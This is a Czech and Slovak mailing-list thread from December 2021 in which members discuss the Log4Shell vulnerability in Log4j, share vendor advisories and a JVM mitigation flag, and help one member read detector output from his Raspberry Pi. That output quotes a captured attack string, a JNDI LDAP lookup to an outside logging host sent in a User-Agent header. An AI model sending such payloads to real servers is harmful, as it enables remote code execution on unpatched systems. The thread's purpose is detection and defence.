[OT] Log4j - klice od pulky internetu

konference na vojtek.biz konference na vojtek.biz
Úterý Prosinec 14 17:33:29 CET 2021 

Má pravdu vedoucí.
Nějak jsem automaticky předpokládal, že tam máte něco co může být napadeno :)
Jo ještě jedna věc - ten pokud máte Log4J starší než tuším 1.2 včetně ten je taky bezpečný.
Takže buďto úplně poslední verzi nebo historickou, ale ta má zase jiné problémy. Člověk si nevybere.
J.V.

-----Original Message-----
From: Hw-list <hw-list-bounces na list.hw.cz> On Behalf Of Jindroush
Sent: úterý 14. prosince 2021 17:30
To: HW-news <hw-list na list.hw.cz>
Subject: Re: [OT] Log4j - klice od pulky internetu

No, ale aby to fungovalo, musi na tom stroji bezet nejaka web-based javova aplikace, ktera loguje utocnikem ovlivnene requesty pres log4j a musite tam mit nekde tu package s log4j. To mate?
V mojich apache logach to je tak, ale jsem javo-prosty.
J.

On 14.12.2021 17:17, Kaliciak, Richard wrote:
> Dobrý deň,
>
> tak som si na svoj RasPi naklonoval
>
> git clone https://github.com/Neo23x0/log4shell-detector
>
> a sviňa je tam, už 10.12., napr:
> [!] FILE: /var/log/lighttpd/access.log.1 LINE_NUMBER: 373
> DEOBFUSCATED_STRING: ${jndi:ldap: LINE: 139.59.8.39 188.102.218.151 -
> [10/Dec/2021:20:44:42 +0100] "GET / HTTP/1.1" 200 1562 "-" 
> "${jndi:ldap://a8fvkc.dnslog.cn/a}"
> ...
> [!] 2 files with exploitation attempts detected in PATH: /var/log 
> [!!!] 11 exploitation attempts detected in the complete scan
>
> Sakra prace, da sa nejako zistit, co sa z tej URL stiahlo? A ci to 
> pobezi aj na armv7?
>
> Zatial som stopol lighttpd a zaver port 80 na routeri.
> Vie mi niekto poradit, co dalej?
>
> Richard Kaliciak
>
>
> Am 13.12.2021 um 13:54 schrieb Dodo Racek:
>> Ono je to takmer uplne vsade... a VEEEELmi neprijemne...
>>
>> Nebezpecnost 10 z 10.
>>
>> VMware
>> https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-
>> 44228/ 
>> <https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021
>> -44228/>
>>
>> Oracle
>> https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
>> <https://www.oracle.com/security-alerts/alert-cve-2021-44228.html>
>> Zalohovania
>> https://www.veritas.com/content/support/en_US/article.100052058
>> <https://www.veritas.com/content/support/en_US/article.100052058>
>>
>> atd...
>>
>> Roboti po internete uz par dni pracuju na plne obratky...
>>
>> Dodo
>>
>>
>>
>> po 13. 12. 2021 o 13:25 <konference na vojtek.biz 
>> <mailto:konference na vojtek.biz>> napísal(a):
>>
>>     Trochu si zaspamuju, ale je to opravdu prusvih.____
>>
>>     Pravdepodobne jste o tom uz  slyseli – jedna se o problem v 
>> apache
>>     knihovne ktera se pouziva skoro vsude kde je java a potrebujete
>>     logovat.____
>>
>>     Popis problem treba tady ____
>>
>>     https://www.wired.com/story/log4j-flaw-hacking-internet/
>> <https://www.wired.com/story/log4j-flaw-hacking-internet/>____
>>
>>     Je potreba si uvedomit, ze je to opravdu skoro vsude a nase
>>     firewally zachycuji aktivni pouzivani techto exploit. Jinak bych 
>> sem
>>     nepsal. Sam jsem doma upravoval kde co pocinaje minecraftem (i
>>     klient) a konce domaci automatizaci____
>>
>>     Oprav existuje nekolik – dat posledni verzi  pridat java parametr
>>       -Dlog4j2.formatMsgNoLookups=true pripadne se da kuchnout jarko 
>> a
>>     udelat tam vymenu classy ____
>>
>>     J.V.____
>>
>>     _______________________________________________
>>     HW-list mailing list  -  sponsored by www.HW.cz 
>> <http://www.HW.cz>
>>     Hw-list na list.hw.cz <mailto:Hw-list na list.hw.cz>
>>     http://list.hw.cz/mailman/listinfo/hw-list
>>     <http://list.hw.cz/mailman/listinfo/hw-list>
>>
>>
>> _______________________________________________
>> HW-list mailing list  -  sponsored by www.HW.cz Hw-list na list.hw.cz 
>> http://list.hw.cz/mailman/listinfo/hw-list
>>
> _______________________________________________
> HW-list mailing list  -  sponsored by www.HW.cz Hw-list na list.hw.cz 
> http://list.hw.cz/mailman/listinfo/hw-list


-- 
Jindroush <jindroush na seznam.cz>

_______________________________________________
HW-list mailing list  -  sponsored by www.HW.cz
Hw-list na list.hw.cz
http://list.hw.cz/mailman/listinfo/hw-list

Další informace o konferenci Hw-list